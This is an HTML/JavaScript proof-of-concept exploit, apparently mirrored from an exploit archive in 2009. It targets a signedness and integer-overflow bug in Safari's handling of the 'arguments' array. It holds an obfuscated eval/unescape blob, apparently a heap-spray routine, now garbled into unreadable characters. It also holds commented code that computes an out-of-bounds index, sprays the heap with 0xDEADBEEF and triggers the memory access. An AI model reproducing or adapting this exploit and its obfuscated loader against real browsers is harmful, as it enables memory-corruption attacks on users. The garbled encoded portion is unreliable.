<BODY>
<CODE id="sploit status"></CODE>
<CODE id="heapspray status"></CODE>
<SCRIPT>
i=0;eval(unescape(("g??#M??????#??g#?¡ë?????¡@?¡?¡®?¡?¡?¡???¡?¡ë?¡????@g?¡®??@???¡®??????#???????¡??????g???????¡ë??????????????M??N????M@M?¡®M??M#M??M?¡M??MgM??M?¡ëM??M??M??MMMNM??N@N?¡®N??N#N??N?¡N??NgN??N?¡ëN??N??N??NMNNN????@???¡®??????#???????¡??????g???????¡ë??????????????M??N????????#??????#M????M??g??g?¡ëg@???¡????????????Ng???¡ë#M????Ng#MN??#??N??#M???????¡??@M#?¡??????g?????????¡N#M?????¡®???????¡ë???¡#M?¡ê?¡®#??M?????¡®g?????¡ëg??#M#??#??#
??g #
#M Ng??N??#??Q?? ??
???? ????g?????¡????g?????¡ë#??M??g#N @
#?? ???¡???¡ëg##M??N????gg??@???¡®g??g?????¡®g?¡ë ??
???? ?¡??Mg#N@????#?¡®???¡ë??N????????M???????¡??????#@?? ??
???? g##??NMg??g?¡g???? N??@g##??gM#????g???? ?¡@#Mg???¡?????? ??M?¡#?? ?¡ë
???¡ ??@#g??@??N?¡????@#?¡??N#?¡®????N?¡®#???? g#?¡®??#??#gMM?¡?? M?¡#???¡ë???¡ ??@#g??@??N?¡ ??
??@ #????N#??????N?¡®#????g##??#??#gMNN#?¡??N#?¡®???? NN#????N#??????g M#???????¡ ?¡???? ????#??????g?????????¡ ??
??g #N#M???¡êMg??#??g??#??N?¡®????#@????#@????#@???????????¡®???¡ë g##Mg##??g## ??g??gM?? ??????#M?? ?¡?¡ê?????¡#???¡???????¡???¡?? #
@?¡ ????????????g#MN?¡®#????#??#?????¡??#MN?¡®#????#??##???¡??#MN?¡®?¡ê@ #?¡®??##??#?????? Mg#M?? ???|?¡®????g#???¡?? ?????¡ë?¡?¡ë????#M# ??g??#??#?? ??
???? ?¡ë?¡?¡®????#M#?????????¡ë?¡?¡®N???¡#???¡ëg?????¡#M?¡ê??????M?¡®#M??Ng?¡?????????? ??g#??????????g#M ?¡???????¡ ??????????g#?¡#M?? #M?¡???????¡ ??
???? ????M??#M??Ng?¡????????#?????¡ë???? ??????#????g????????M???¡M??g?????? ???????????¡ëNM?????? ??g??M@ g?????????? ??
M?¡ #???¡ë???¡??@?¡???¡???????????? ?¡ë????g???????¡??????g#???¡ë?? ????N????M@?????¡#?? ???????| ?¡®g?????¡ë ??
?¡ë?? ??g??????????????g@?????? ?¡®M??g??????????M?¡????#?¡® ????#??????#?¡ê????#?¡????# ??????#?? ????#??g ??
???? ?¡???¡???????????¡gM???? ??????ggg#??@?????¡???¡ N#???¡M???????¡ë????????M?¡????#?¡®???? #????N# M???¡ë??N ??
@?? @g??#???¡@#M??g?? ???¡@?¡????N?¡M#??M???¡ @???¡ë????????g??????g#N???? @M???? @?¡@???¡ëg ?????¡?¡ ??
g# N???¡M#M?¡@?¡??g#N ???¡Mg?¡®M?????????????¡®N#M M?¡êM??N???¡gg??@?? ???¡?¡?? ???¡????????M?? N?????? ??
?¡?¡ ??N???¡ê???¡®???????????? ??M??N?????¡?????¡???¡ë????#??MM??N?????¡ ?????¡#Mg?????¡ #??MM?? N?????????¡?¡?¡ê M????# ??
g# ???¡g???¡?????¡ë??M???¡ ????g?¡g??????MM???????¡®MNN ?¡ë?????????? gM???? ??N#??#g #???? ??
???? g????#M??#g#?¡#M ??N?¡ëg#M??????????M NN?¡ëg #M??M ??????N# ??#g# ?¡
#M ??#M????M???¡???¡??g ????????gM?¡N?¡ N ?¡N?¡N ?¡????M??#????????gM?¡ ???????? g
??# ????????N#???????¡??# N?¡??????#?? M???? #M?¡®?? ?¡ë??# M?¡® ??NM????N?????????¡????M????#M?? #g# ??
???? ????g??????#g#?¡#M ??#??gM N?¡ëg#g?? g??M?? ??g???????¡ë ????????M?????????????¡®N #????#MN???? ?¡ê???¡ ??
?¡ë?? ?????????¡®????????N@?? ?¡ë#???? ??#M?¡???????¡?? ?? ??#???? ??#MN????#???? ???¡ë????????N?????????? ??g???????? ????#?¡®???¡ë ????N?? ??
???? ????g????#?????¡ë???¡ë# ???? ??????g????????g#M ????#???? g#N# M#??#????g??M??M N#????????#M ????#??M?? ????????N??g@????gg???? #?????? ??
g?? ?¡ë???¡ë????????#M????# ??gMNMg??g?¡g????N?? @????????#@ ???????¡® MN????g#?? ??M??????N# ??#M??# M????#???? ?¡®?¡#????M???? g??@?? ??
g?? ??????M??@???¡??#??g #?¡ë??N??@g????????@???¡M ??#?¡ë??N??N???? #?????¡® ?¡???¡??g?? ???¡®g#g# g?¡??MM ????g?? @???¡®???????? NMg #
g# ??@g??????g?????¡ë?? ?????¡ë??????Ng#??@???? ???????? g?¡g@??@g???? ????@?? ?¡??#?¡??# ?¡ë???¡®??@?? ?¡ê???¡®g?¡ g#?? ?¡???????????? g?¡ë?? @
???? g?????¡®??g??M?? ?¡??Ng?????????¡ë?????? N????g@N Mg@???¡®NM?? ??????# ?¡®MNN?¡ë g@NMg@ ???¡®NM ????M?? N#????#M ??#?¡ ??
?¡?? g#g??g??M?? ??g???????¡ë?????????? ????#???????? M?¡ë?? ?¡ë#??????????g ???????? ?¡®????M???? @??#??Q?? ?¡ëg#N #???? #M?? N????gg?? @M#?????? ?¡®???¡ë #
??M ?????????¡#??# M?¡êM#?¡®???¡ëg?????? g??????gg ??@??N?? ?¡gg??@???¡ g??g?? ????g???? ???¡?????? ???????? ???|g#?? ?¡g?? g#??@???? ???????????¡ê??@g#??@??M g
?¡g #g????@?????? ?¡???????¡g?????¡ ??N???????? ????????g?¡?? N??????@?? @????# ?¡ë???????? ????#?????? ?|??g?? ??????????@ M????@g# ?¡?????¡®?¡MN #???¡ë#Mg# ?¡
???? ?¡®?¡M?¡?????? ?¡M#?????¡®?¡???¡ ??g?????¡ë ??Ng#????g?? ???¡?????? Mg#???? ??@??# ??????@?? ????@?? ?????????|g#???¡g???? @???¡??????N?? ??#?¡®?¡ê ??????#???? ?¡ë
??N #????@??@ ??????N??N????# ??????#M ????????#@?????? ??????#N #N#?¡®?? ?¡ë???¡ë???? ???¡ë?????? ???????? ?????? #N#N#?¡®???¡ë???????¡ëN@???¡ë #??M?? ????N@ #NM ?¡ë
N# ???¡ë???¡g?? ??#????g#g# #M????N @??MM?¡ë#?????? #M?????? ??M?¡ë?? ?¡ë?????? ?????????¡ë ???¡g ????#?? ??g#g#???? M?¡ëM NgMg M
N?? #???¡ê???????? @??????#??????@??????#???? ???¡ëg##???¡???? ????@g g???¡ëg ???????? @M??g# ????g ?????¡ ???? ??@???¡ê ??@g# M
???¡ ????????????N?? N????????g#???¡ë#M?????? ?????¡®g#?¡?¡ë#M ?¡???¡M ???????¡ë?? ?¡ëg# #M?¡ê@ ?????? ??#M# ?????? ???¡ë?? g#M?? #
??g g?¡® ??????#?¡???¡???? #NM???????¡?????¡?¡®????#?¡® MNN?¡ë??#NM?? ?????¡?? ???¡?¡®M?? N# M?? ??#g #???¡ëN @#???¡ ?????? #??N#?? #
g# ???¡ë????#M ??#g#???¡ëg?¡®?? ????M????#?¡®MN???¡????g#???¡ g??N?????¡?¡?? #?¡ë?? ?¡®??@?? ????# ??????@?? ???|??g?? ??Mg #????M?? ??
g?? ??g#?????¡?¡ë????# ?¡®MNgMN?¡ëg#?? ???¡?¡ëM??N #M????#Mg #????N??g#N#MM?? ??M???¡ê?¡ ??#?? ??N??g#??#M M????????#?¡?? N#N ??#M???? ??
N?¡ ?¡ë??????????N?¡?¡®???????¡ë???? #??#?????¡ëN?????? ??@#M?????? N?¡?¡®N???¡ #???¡ëg?????¡ ???¡ë????# ??#??g# ??g# M??#Mg#??N????M??#?¡???? ?¡ë#?¡ë# ??N???????? #
?¡?? ???¡ë#?¡ë???????¡®g#?¡?¡ë?¡??g#??g?¡M #Mg#??g??????# g#???¡ë???? N??????g# ??gN@ ?????¡???? ??#????M????N?????????¡ëN????????@???¡ë??Mg#??g N@?? ?¡ë???????¡ë???¡ëg#?????????? ???????? ??#M?¡?? ??
???? ?¡ë??g????#M??#Mg#????M ?¡??#???¡??N?¡ëg# M???????¡?? ?????¡???¡??g ?????¡® ??????#?? ?????¡??????@??@??N???¡ëg#??N??M??????#????g#??@??????@??#??????N?????? ?¡ë???¡® ???¡ë??@g????????@g #?????? @gN???¡?? #
??g #?¡ë??N??M???¡??????N?? g??????#?¡?????¡ë#?¡ë ??N????g #?????¡?¡ë????# ?¡®MN ???¡????g#???¡g?????¡®??#???????????????¡ ???¡êg??M????g??@??g?? ?¡®g?? ??????????g???¡ ?? ??#??M?? g??g?¡ëg@ ??
?¡?? ??????????N?????¡ë???¡®?? ??N?????????¡ë#??M?? ggM???? ??????gg??N?? g??# ???¡ëggM??????????gg??N??g ??#???????¡ë#???? ?¡®?¡?¡ë??@g#?????? @???? ?? ????N???¡?? N????????M?? ??
???? ??????MN#??gMgM?? #g?????¡??N??g???¡® ????????N Mg#g##?¡ë??N ????# ?¡®?¡ê??????#?????¡ë?????? ??#??g??#g??????g#?¡®??#?? #M?¡MgM?? g?? g??g?¡???¡M ?¡???¡ë?¡?¡ë???? M
??# @M?¡???¡ë?¡?¡®????M??# @gM?¡@?????¡#g?¡ëg #g???? ?¡??M?¡?¡êg@???¡?? ?¡ê???¡ë ???????¡ë???¡êN??g #?¡?¡®?¡?¡êg??g??M????g?¡?¡g?¡??N?? #g?? ???¡ë??????N?¡ ?????¡ë ?¡??????g?????¡ë???¡®?? N???¡ê???¡?¡?¡ë?? ??
???¡ ????g@?¡????N??????# ?????¡#???¡ëg?????¡?? ????????M g@??????N???¡??N g??g?¡® ????g#???¡ g???¡?????¡ë??M???¡????g?¡g????@???¡??N?? gg?? ???????¡®??#?¡?? ?¡???????? ????g?????¡?????????????????¡???????????? ?¡
#?? ?¡ëg?????¡??##??#??# ??????g@g?????¡®g?¡ë ???¡#@ g????@?????¡?????????¡ë ??g???¡ë ?¡#g ?????¡®g?? g????g??????Ng#g?¡?? ??g#g ??g?????????¡ë?¡?¡ë?? ????#?????????? ?¡g??????#????#????#M??N????g?? ??
?¡ë?? g????????g????Ng?¡g# ???????¡®??g???¡??Ng?? M?????? ??M???¡®g????gg?¡??M???¡??Ng ??g#?? N??#??Q ???????????¡???¡??N???? ?¡?????? ???????¡ë????g?¡ëg?????¡g#???¡®??????#?????? ?¡????M@?¡???¡???????¡???¡?? ??
???? ?????¡ë????M?¡®????????g?¡g?? g@g?¡g?????¡???????¡ ??M???? ??Ng??M?????¡ë???????? M#??N g?¡??M?? ??????M???¡??????#??M?¡ ?????¡??????M ????N?¡?????¡®g????g???¡g????gMg ?????¡?????¡g?? ??
??g #???¡M??g??????g?¡g#M?¡ë#@g??# ?¡®??##??????#??M?????¡ë??NM?? #M???? ???¡????M???? ?????????? ??N?? ?¡???????¡®??N????????????MM?????¡gg???? ?¡®g@g@????MN???¡ë#??gM M
???? NNMg@???????¡®???¡ê???¡????????N@??N??????@N?¡®#??g??#@N????M?? ?????? ??N N#???¡ë g??N???¡#???¡g??g??M????gN?¡?? ????N????g#g@#?? N
???? ?¡®?¡???¡??g????#NM???????¡??????@??????N???¡ ??@Ng M#?¡?? ?????????????¡???????¡?¡®N?? M#??Ng@g???? ??
g?? ????g??g?¡ëg@???¡??N g???? ???¡?¡®N?¡ë ?????¡???¡??N ?????¡ë???? ??
?¡?? ?????????? ?????? @
N?? ?¡???????? ?¡ ??
N?? g#?¡ë??Ng N
???¡ ??????N??g N
???? #?????????? ??
???¡ ???¡êg????g?? ?¡®
g?? ??????????g???¡ N
Mg ?????¡NNM?¡?¡# ??
???? ???|?¡®g?????¡ë????## ??
@?? N?¡????@N?????????? ????g????????@?¡?????? ??
???? ?¡®??N??@????g?¡ëg?????¡g#??????N????g ?¡®??????#?¡???¡????#?????????? #
???? #M?¡??????g?¡?? N???????¡????m?????¡???????????¡???????¡ëg#????M??g???¡????????gM????g ??
#?? #M?¡?¡ ??M??N?¡®?????¡?¡ë?¡#???????¡ëg#??#????????g#???????¡®???¡ê ??
???? gg ??????g?¡??N??????????N???????????¡®g????M ??
@?? ?? ???¡????g@??@??N??#???¡ë?? ??
g?? ??
???¡?¡®????????#??????????g????????#?¡êM#g#???¡ê????#??M??M?¡ê??????#M????g??#M??????Ng#g@???????¡ëg??????g????N??#????????g?????¡®g????????#???¡ë???¡ë???¡ë??N???????????¡ë??N????g????Ng@????g@???????¡ë???¡ë???¡ë#?????¡g?????????????????????¡ë#????????????M??#????#??#?¡ê?¡??#?¡®").replace(/./g,function(c){return" `'^*\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))
// The index for the "arguments" array in a JavaScript function in
// Safari suffers from a signedness issue that allows access to elements
// that are out of bounds. The index is cast to a signed value before it
// is compared to the length of the array to check if it within the
// bounds. Integer values larger than 0x8000,0000 will be cast to a
// negative value and because they are always smaller then the length,
// they are treated as a valid index.
// The index into the arguments array ends up in instructions
// that multiply it by 4 to access data in an array of 32 bit values.
// There are no checks for overflows in this calculation. This allows us
// to cause it to access anything in memory:
// Pointer to object = base address + 4 * index
// The base address varies only slightly and is normally about
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
// predictable location using heap spraying, we can then calculate an
// index that will access this memory.
var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
var iTargetArea = 0x10000000;
// Be advised that heap spraying is "upside down" in Safari: strings
// are allocated at high addresses first and as the heap grows, the
// addresses go down. The heap will therefor grow in between a lot of
// DLLs which reside in this area of the address space as well.
// We'll need to find an area of memory to spray that is not likely to
// contain a DLL and easy to reach.
var iTargetAddress = 0x55555555;
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
// iIndex = (iTargetAddress - iBase) / 4
var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
// We need to trigger the signedness issue so the index must be larger
// then 0x8000,0000. Because of the integer overflow in the
// multiplication, we can safely add 0x4000,0000 as often as we want;
// the multiplication will remove it from the result.
while (iIndex < 0x80000000) iIndex += 0x40000000
document.getElementById("sploit status").innerHTML = (
"iBase + 4 * iIndex = " +
"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
);
// Set up heap spray
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
oHeapSpray.oOutputElement = document.getElementById("heapspray status")
// Spray heap asynchronously and call sploit when done.
oHeapSpray.spray(sploit)
function sploit(oHeapSpray) {
// This will cause an access violation using the value 0xDEADBEEF,
// which comes from the strings we sprayed the heap with.
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
arguments[iIndex];
}
function DWORD(iValue) {
return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
}
</SCRIPT>
</BODY>
# www.Syue.com [2009-01-05]